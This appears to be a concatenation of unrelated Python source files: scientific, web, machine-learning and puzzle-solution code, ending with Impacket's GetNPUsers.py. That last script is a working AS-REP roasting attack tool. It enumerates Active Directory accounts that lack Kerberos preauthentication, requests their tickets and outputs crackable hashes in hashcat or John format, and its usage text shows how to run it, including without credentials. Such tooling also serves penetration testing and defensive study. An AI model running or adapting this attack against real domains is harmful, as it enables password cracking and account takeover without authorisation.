start = '{:>25} '.format(dataset_name.replace('_', '\\_'))
one_line = start
pipeline_idx = 0
for pipeline_type, pipeline_stats in sorted(pipeline_types.items()):
assert(isinstance(pipeline_stats["absolute_errors"], result.Result))
log.info("Pipeline type: %s"%pipeline_type)
# if pipeline_type is not "S": # Ignore S pipeline
median_error_pos = pipeline_stats["absolute_errors"].stats["median"] * 100 # as we report in cm
# mean_error_pos = pipeline_stats["absolute_errors"]["mean"] * 100 # as we report in cm
rmse = pipeline_stats["absolute_errors"].stats["rmse"]
rmse_error_pos = rmse * 100 # as we report in cm
assert(pipeline_stats["trajectory_length_m"] > 0)
drift = rmse / pipeline_stats["trajectory_length_m"] * 100 # as we report in %
# Bold for min median error
if len(winners[dataset_name][0]) == 1 and pipeline_idx == winners[dataset_name][0][0]:
one_line += bold_in + '{:.1f}'.format(median_error_pos) + bold_out
else:
one_line += '& {:.1f} '.format(median_error_pos)
# Bold for min mean error
# if len(winners[dataset_name][1]) == 1 and winners[dataset_name][1][0] == pipeline_idx:
# one_line += bold_in + '{:.1f}'.format(mean_error_pos) + bold_out
# else:
# one_line += '& {:.1f} '.format(mean_error_pos)
# Bold for min rmse error
# Do not bold, if multiple max
if len(winners[dataset_name][1]) == 1 and winners[dataset_name][1][0] == pipeline_idx:
one_line += bold_in + '{:.1f}'.format(rmse_error_pos) + bold_out
else:
one_line += '& {:.1f} '.format(rmse_error_pos)
# Bold for min drift error
# Do not bold, if multiple max
if len(winners[dataset_name][2]) == 1 and winners[dataset_name][2][0] == pipeline_idx:
one_line += bold_in + '{:.1f}'.format(drift) + bold_out
else:
one_line += '& {:.1f} '.format(drift)
pipeline_idx += 1
one_line += end
all_lines += one_line
all_lines += end_line
# Save table
results_file = os.path.join(results_dir, 'APE_table.tex')
print("Saving table of APE results to: " + results_file)
with open(results_file,'w') as outfile:
outfile.write(all_lines)
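if __name__ == '__main__':
    # Minimal hedged example: exercise only the header helper with made-up
    # pipeline names and metric labels (they are not taken from any real run),
    # just to show the LaTeX preamble it generates.
    print(write_latex_table_header(["S", "SP", "SPR"],
                                   ["Median [cm]", "RMSE [cm]", "Drift [\\%]"]))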
|
py | b41068afc860cf30896654ab00917e0358bd4549 | """
WSGI config for TheThingsIBuy project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TheThingsIBuy.settings')
application = get_wsgi_application()
|
py | b41069940b3579c62a083005c3038e1e23d6b871 | import os.path as osp
import torch
import torch.nn.functional as F
from scripts.study_case.ID_4.torch_geometric.datasets import Planetoid
from scripts.study_case.ID_4.torch_geometric.nn import GraphUNet
from scripts.study_case.ID_4.torch_geometric.utils import dropout_adj
dataset = 'Cora'
path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', dataset)
dataset = Planetoid(path, dataset)
data = dataset[0]
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
pool_ratios = [2000 / data.num_nodes, 0.5]
self.unet = GraphUNet(dataset.num_features, 32, dataset.num_classes,
depth=3, pool_ratios=pool_ratios)
def forward(self):
edge_index, _ = dropout_adj(
data.edge_index, p=0.2, force_undirected=True,
num_nodes=data.num_nodes, training=self.training)
x = F.dropout(data.x, p=0.92, training=self.training)
x = self.unet(x, edge_index)
return F.log_softmax(x, dim=1)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model, data = Net().to(device), data.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=0.001)
def train():
model.train()
optimizer.zero_grad()
F.nll_loss(model()[data.train_mask], data.y[data.train_mask]).backward()
optimizer.step()
def test():
model.eval()
logits, accs = model(), []
for _, mask in data('train_mask', 'val_mask', 'test_mask'):
pred = logits[mask].max(1)[1]
acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()
accs.append(acc)
return accs
best_val_acc = test_acc = 0
for epoch in range(1, 201):
train()
train_acc, val_acc, tmp_test_acc = test()
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = tmp_test_acc
log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'
print(log.format(epoch, train_acc, best_val_acc, test_acc))
|
py | b4106a0aaf7e2a9b80e6ddb018d76e9ec33db6fa | # Copyright 2019 1QBit
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
class ElectronicStructureSolver(abc.ABC):
"""Sets interface for objects that perform energy estimation of a molecule.
Specifics vary between concrete implementations, but common to all of them
is that after `simulate` is called, the right internal state is set for the
class so that `get_rdm` can return the reduced density matrix for the last
run simulation.
"""
def __init__(self):
pass
@abc.abstractmethod
def simulate(self, molecule, mean_field=None):
"""Performs the simulation for a molecule.
The mean field is calculated automatically if not passed in by the
calling code.
Args:
molecule (pyscf.gto.Mole): The molecule on which to perform the
                simulation.
            mean_field (pyscf.scf.RHF): The mean field of the molecule. Computed
automatically if `None` is passed in.
"""
pass
@abc.abstractmethod
def get_rdm(self):
"""Returns the RDM for the previous simulation.
In a concrete implementation, the `simulate` function would set the
necessary internal state for the class so that this function can return
the reduced density matrix.
Returns:
(numpy.array, numpy.array): The one- and two-particle RDMs (float64).
Raises:
RuntimeError: If no simulation has been run.
"""
pass
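# --- Illustrative sketch (not part of the original file) ---
# A minimal concrete subclass showing how the interface above is meant to be
# used. The mean-field handling assumes the standard pyscf.scf.RHF API
# (scf(), e_tot, make_rdm1()); the 2-RDM is left as a placeholder rather than
# a real electronic-structure calculation.
class DummyElectronicStructureSolver(ElectronicStructureSolver):
    """Toy solver that runs a bare RHF calculation and caches its 1-RDM."""
    def __init__(self):
        super().__init__()
        self._one_rdm = None
        self._two_rdm = None
    def simulate(self, molecule, mean_field=None):
        from pyscf import scf
        if mean_field is None:
            mean_field = scf.RHF(molecule)
            mean_field.verbose = 0
            mean_field.scf()
        # Cache the mean-field RDM so get_rdm can return it later.
        self._one_rdm = mean_field.make_rdm1()
        self._two_rdm = None  # a real solver would also build the 2-RDM here
        return mean_field.e_tot
    def get_rdm(self):
        if self._one_rdm is None:
            raise RuntimeError("No simulation has been run.")
        return self._one_rdm, self._two_rdm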
|
py | b4106b0acff680d814400920ed36dcbadd31988c | from radiomixer.io.signal import Signal
from radiomixer.transforms.transform import Transform, TransformType
class ExtractSegment(Transform):
def __init__(self):
super().__init__(TransformType.EXTRACTSEGMENT)
def process(self, signal:Signal):
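        # Crop the signal to the [start, end) sample range stored in its
        # 'segment' parameter; mono (1, N) tensors are squeezed, sliced,
        # and reshaped back to shape (1, -1).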
signal.name = self._prepend_transform_name(signal.name)
start, end = signal.parameters['segment'][0], signal.parameters['segment'][1]
if signal.data.shape[0]==1:
audio = signal.data.squeeze(0)
signal.data = audio[start:end].view(1, -1)
return signal
|
py | b4106b3105ac17209df052a066615fb58b28618f | import re
import requests
import datetime
import pytz
from bs4 import BeautifulSoup
FITNESS_URL = "https://connect2concepts.com/connect2/?type=bar&key=650471C6-D72E-4A16-B664-5B9C3F62EEAC"
CALENDAR_URL = "https://api.teamup.com/ks13d3ccc86a21d29e/events"
class Fitness(object):
"""Used to interact with the Penn Recreation usage pages.
Usage::
>>> from penn import Fitness
>>> fit = Fitness('SCHEDULE_TOKEN')
>>> fit.get_usage()
"""
def __init__(self, schedule_token):
self.token = schedule_token
def get_schedule(self):
resp = requests.get(CALENDAR_URL, timeout=30, headers={
"Teamup-Token": self.token
})
resp.raise_for_status()
raw_data = resp.json()
data = {}
for item in raw_data["events"]:
name = re.sub(r"\s*(Hours)?\s*-?\s*(CLOSED|OPEN)?$", "", item["title"], re.I).rsplit("-", 1)[0].strip().title()
out = {
"all_day": item["all_day"]
}
if not item["all_day"]:
out["start"] = item["start_dt"]
out["end"] = item["end_dt"]
else:
out["day"] = item["start_dt"].split("T")[0]
if name not in data:
data[name] = {
"name": name,
"hours": []
}
data[name]["hours"].append(out)
return list(data.values())
def get_usage(self):
"""Get fitness locations and their current usage."""
resp = requests.get(FITNESS_URL, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
}, timeout=30)
resp.raise_for_status()
soup = BeautifulSoup(resp.text, "html5lib")
eastern = pytz.timezone('US/Eastern')
output = []
for item in soup.findAll("div", {"class": "barChart"}):
data = [x.strip() for x in item.get_text("\n").strip().split("\n")]
data = [x for x in data if x]
name = re.sub(r"\s*(Hours)?\s*-?\s*(CLOSED|OPEN)?$", "", data[0], re.I).strip()
output.append({
"name": name,
"open": "Open" in data[1],
"count": int(data[2].rsplit(" ", 1)[-1]),
"updated": eastern.localize(datetime.datetime.strptime(data[3][8:].strip(), '%m/%d/%Y %I:%M %p')).isoformat(),
"percent": int(data[4][:-1])
})
return output
|
py | b4106be9a45dbd10ec90aad57743c821fa100944 | # 881. Boats to Save People
#
# 20200725
# huao
# Since each boat carries at most two people, the following greedy idea works:
# sort the weights in descending order,
# take the heaviest remaining person and pair them with a partner the boat can still carry,
# then repeat.
# Because the list is sorted, the partner can be found with binary search; otherwise it would time out.
from typing import List
class Solution:
def numRescueBoats(self, people: List[int], limit: int) -> int:
people.sort(reverse=True)
i = 0
count = 0
while i < len(people):
j = self.binarySearch(
people, limit - people[i], i + 1, len(people))
if j >= 0:
people.pop(j)
count += 1
i += 1
return count
def binarySearch(self, people: List[int], target: int, begin: int, end: int) -> int:
if begin == end:
return -1
if begin + 1 == end:
if people[begin] <= target:
return begin
elif end != len(people) and people[end] <= target:
return end
else:
return -1
mid = (begin + end) // 2
if people[mid] == target:
return mid
elif people[mid] > target:
return self.binarySearch(people, target, mid, end)
else:
return self.binarySearch(people, target, begin, mid)
sol = Solution()
print(sol.numRescueBoats([1, 2, 2, 3], 3))
print(sol.numRescueBoats([3, 5, 3, 4], 5))
print(sol.numRescueBoats([44, 10, 29, 12, 49, 41, 23, 5, 17, 26], 50))
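# --- Illustrative sketch (not part of the original solution) ---
# The same greedy idea is usually written with two pointers instead of binary
# search plus pop(), which avoids the O(n^2) behaviour of repeated pops:
# pair the heaviest remaining person with the lightest one if they fit,
# otherwise the heaviest person rides alone.
def num_rescue_boats_two_pointers(people, limit):
    people.sort()
    light, heavy = 0, len(people) - 1
    boats = 0
    while light <= heavy:
        if people[light] + people[heavy] <= limit:
            light += 1  # the lightest person shares this boat
        heavy -= 1      # the heaviest remaining person always departs
        boats += 1
    return boats
print(num_rescue_boats_two_pointers([3, 5, 3, 4], 5))  # expected: 4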
|
py | b4106c1e19deb5af515b517974a4ae557b9126fe | # Author: OMKAR PATHAK
# leaf node is the one which does not have any children
from Tree import Node
def countLeafNodes(root):
if root is None:
return 0
if(root.left is None and root.right is None):
return 1
else:
return countLeafNodes(root.left) + countLeafNodes(root.right)
if __name__ == '__main__':
root = Node(1)
root.setLeft(Node(2))
root.setRight(Node(3))
root.left.setLeft(Node(4))
print('Count of leaf nodes:',countLeafNodes(root))
|
py | b4106c5b509168f4e28d8328de977f3b1ea82cd3 | class Solution(object):
def groupAnagrams(self, strs):
"""
:type strs: List[str]
:rtype: List[List[str]]
"""
ret,table = [],{}
for i in range(len(strs)):
s = str(sorted(strs[i]))
if s in table:
table[s].append(strs[i])
else:
table[s] = [strs[i]]
for key in table: ret.append(table[key])
return ret
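# Illustrative usage (not part of the original file); groups follow dict
# insertion order, so the exact ordering of the output lists may vary.
if __name__ == '__main__':
    print(Solution().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]))
    # e.g. [['eat', 'tea', 'ate'], ['tan', 'nat'], ['bat']]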
|
py | b4106e03e080e735a27cd3db4e7bfeb1e7c4cdc0 | import argparse
import logging
from pathlib import PurePath
from pandas import DataFrame, read_csv
from tqdm import tqdm
from .helpers.auxfunc import AuxFuncPack
from .conv.export_dfs import DfExporter
logging.basicConfig(level=logging.INFO, format='%(message)s')
class CoreMethods:
def start_main(self):
# get options from user
        parser = argparse.ArgumentParser(description='Analyse mutations in all nucleotide alignment .fasta files from a target.')
parser.add_argument(
'target', help='Target .fasta file to be analysed.', type=str,
metavar='TARGET'
)
parser.add_argument(
'reportType', help='Output report file type.', type=str,
choices=['csv', 'xls', 'all'], metavar='REPORTTYPE'
)
parser.add_argument(
'--reportName', help='Output report custom file name.'
)
parser.add_argument(
'--reportPath', help='Output report custom file path.'
)
parser.add_argument(
'--searchKP', help='Custom keyphrase to detect searchable sequences.'
)
parser.add_argument(
'--debug', help='Turn debug messages on.', action='store_true'
)
args = vars(parser.parse_args())
# config logging
self.set_debug_mode(args['debug'])
# run
searchable_keyphrase = args['searchKP'] if (args['searchKP'] is not None) else 'consensus sequence'
results_df_list = self.start_run(args['target'], searchable_keyphrase)
# export dfs
report_path = args['reportPath'] if (args['reportPath'] is not None) else PurePath(args['target']).parent
report_name = args['reportName'] if (args['reportName'] is not None) else PurePath(args['target']).name
self.start_export(
results_df_list, args['reportType'], report_name, report_path
)
logging.debug('Done.')
def start_run(self, target_path, searchable_keyphrase):
# run analyser
logging.debug(f'Starting analysis for {target_path}')
# create handler of custom functions
auxf_handler = AuxFuncPack()
# create list from .fasta target file
target_folder = PurePath(target_path).parent
target_list = auxf_handler.fasta_to_list(target_path)
# create dfs
df_mut_results = DataFrame(columns=['ColNum', 'PossibleCodons', 'PossibleMuts', 'PossiblePols', 'GenScore'])
df_alert_results = DataFrame(columns=['SeqName', 'ColNum', 'AlertType'])
df_codons = read_csv(PurePath(__file__).parent.parent / 'data' / 'codons.csv')
df_pols = read_csv(PurePath(__file__).parent.parent / 'data' / 'pols.csv')
# execute deep searcher on each column from .fasta target file
number_codons = int(len(target_list[0][1])/3)
isDebugModeActive = logging.getLogger().isEnabledFor(logging.DEBUG)
for current_codon in tqdm(range(0, number_codons), disable=not isDebugModeActive):
current_col = current_codon*3 # aiming codon's initial position
root, df_alert_results = auxf_handler.deep_searcher(
target_folder, target_list, current_col, df_alert_results, searchable_keyphrase
)
# get root list of elements
codon_leaves = []
for leaf in root.leaves:
# keep only codons without special chars
if len(set(leaf.codon).difference(set(['A', 'C', 'T', 'G']))) == 0:
codon_leaves.append(leaf.codon)
# unify list
unified_list = list(set(codon_leaves))
if len(unified_list) > 1:
# get codons percentages dict
codons_dict = auxf_handler.get_codons_perc_dict(root, unified_list)
# get aminos from codons
aminos_dict = auxf_handler.get_aminos_from_codons(codons_dict, df_codons)
# get codons mutations dict
muts_dict = auxf_handler.get_mutations_perc_dict(aminos_dict, codons_dict, df_codons)
# get polarities percentages dict
pols_dict = auxf_handler.get_polarities_perc_dict(aminos_dict, df_pols)
# get polarity score
curr_pol_score = auxf_handler.get_pol_score(pols_dict, df_pols)
# get general score
curr_gen_score = auxf_handler.get_gen_score(curr_pol_score, muts_dict)
# round dict values
codons_dict = auxf_handler.round_dict_values(codons_dict, 5, True)
muts_dict = auxf_handler.round_dict_values(muts_dict, 5, False)
pols_dict = auxf_handler.round_dict_values(pols_dict, 5, True)
# increment on df_mut_results
df_mut_results = df_mut_results.append(
{
'ColNum': current_col+1,
'PossibleCodons': codons_dict,
'PossibleMuts': muts_dict,
'PossiblePols': pols_dict,
'GenScore': round(curr_gen_score, 5)
}, ignore_index=True
)
results_df_list = [df_mut_results, df_alert_results]
return results_df_list
def start_export(self, results_df_list, report_type, report_name, report_path):
# export dfs
DfExporter().export_dfs(
results_df_list, report_type, report_name, report_path
)
def set_debug_mode(self, isActive):
curr_level = logging.DEBUG if isActive else logging.INFO
logging.getLogger().setLevel(curr_level) |
py | b4106eb7c0e326a2165e41a2af5f560b892358d6 | #!/usr/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This script will attempt to list and get TGTs for those users that have the property
# 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
# For those users with such configuration, a John The Ripper output will be generated so
# you can send it for cracking.
#
# Original credit for this technique goes to @harmj0y:
# https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
# Related work by Geoff Janjua:
# https://www.exumbraops.com/layerone2016/party
#
# For usage instructions run the script with no parameters
#
# ToDo:
#
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import logging
import random
import sys
from binascii import hexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.kerberosv5 import sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserNoPreAuth:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def __init__(self, username, password, domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__no_pass = cmdLineOptions.no_pass
self.__outputFileName = cmdLineOptions.outputfile
self.__outputFormat = cmdLineOptions.format
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGT = cmdLineOptions.request
self.__kdcHost = cmdLineOptions.dc_ip
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
                raise Exception('Error while anonymous logging into %s' % self.__domain)
else:
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
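        # Converts a Windows FILETIME value (100-nanosecond intervals since
        # January 1, 1601 UTC) into a Unix timestamp in seconds.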
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self, userName, requestPAC=True):
clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = self.__domain.upper()
serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
encodedPacRequest = encoder.encode(pacRequest)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacRequest
reqBody = seq_set(asReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.proxiable.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
seq_set(reqBody, 'cname', clientName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['rtime'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
# RC4 not available, OK, let's ask for newer types
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
r = sendReceive(message, domain, self.__kdcHost)
else:
raise e
# This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
# 'Do not require Kerberos preauthentication' set
try:
asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
except:
# Most of the times we shouldn't be here, is this a TGT?
asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
else:
# The user doesn't have UF_DONT_REQUIRE_PREAUTH set
raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
if self.__outputFormat == 'john':
# Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
else:
# Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
return '$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
@staticmethod
def outputTGT(entry, fd=None):
if fd is None:
print(entry)
else:
fd.write(entry + '\n')
def run(self):
if self.__usersFile:
self.request_users_file_TGTs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None:
target = self.__kdcHost
else:
target = self.__domain
# Are we asked not to supply a password?
if self.__doKerberos is False and self.__no_pass is True:
# Yes, just ask the TGT and exit
logging.info('Getting TGT for %s' % self.__username)
entry = self.getTGT(self.__username)
self.outputTGT(entry, None)
return
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
# Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled)
logging.info('Cannot authenticate %s, getting its TGT' % self.__username)
entry = self.getTGT(self.__username)
self.outputTGT(entry, None)
return
# Building the search filter
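        # 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extensible
        # match, so this selects enabled user objects (not UF_ACCOUNTDISABLE)
        # whose userAccountControl has UF_DONT_REQUIRE_PREAUTH set.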
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "Name", "MemberOf", "PasswordLastSet", "LastLogon", "UAC"])
print('\n\n')
if self.__requestTGT is True:
usernames = [answer[0] for answer in answers]
self.request_multiple_TGTs(usernames)
else:
print("No entries found!")
def request_users_file_TGTs(self):
with open(self.__usersFile) as fi:
usernames = [line.strip() for line in fi]
self.request_multiple_TGTs(usernames)
def request_multiple_TGTs(self, usernames):
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for username in usernames:
try:
entry = self.getTGT(username)
self.outputTGT(entry, fd)
except Exception as e:
logging.error('%s' % str(e))
if fd is not None:
fd.close()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for users with "
"'Do not require Kerberos preauthentication' set and export their TGTs for cracking")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default=False, help='Requests TGT for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-format', choices=['hashcat', 'john'], default='hashcat',
help='format to save the AS_REQ of users without pre-authentication. Default is hashcat')
parser.add_argument('-usersfile', help='File with user per line to test')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                                                                             'omitted it will use the domain part (FQDN) '
                                                                             'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
print("\nThere are a few modes for using this script")
print("\n1. Get a TGT for a user:")
print("\n\tGetNPUsers.py contoso.com/john.doe -no-pass")
print("\nFor this operation you don\'t need john.doe\'s password. It is important tho, to specify -no-pass in the script, "
"\notherwise a badpwdcount entry will be added to the user")
print("\n2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set")
print("\n\tGetNPUsers.py contoso.com/emily:password or GetNPUsers.py contoso.com/emily")
print("\nThis will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. \nHowever "
"it will require you to have emily\'s password. (If you don\'t specify it, it will be asked by the script)")
print("\n3. Request TGTs for all users")
print("\n\tGetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily")
print("\n4. Request TGTs for users in a file")
print("\n\tGetNPUsers.py contoso.com/ -no-pass -usersfile users.txt")
print("\nFor this operation you don\'t need credentials.")
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?').match(options.target).groups('')
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.k is False and options.no_pass is True and username == '' and options.usersfile is None:
logging.critical('If the -no-pass option was specified, but Kerberos (-k) is not used, then a username or the -usersfile option should be specified!')
sys.exit(1)
if options.outputfile is not None:
options.request = True
try:
executer = GetUserNoPreAuth(username, password, domain, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
|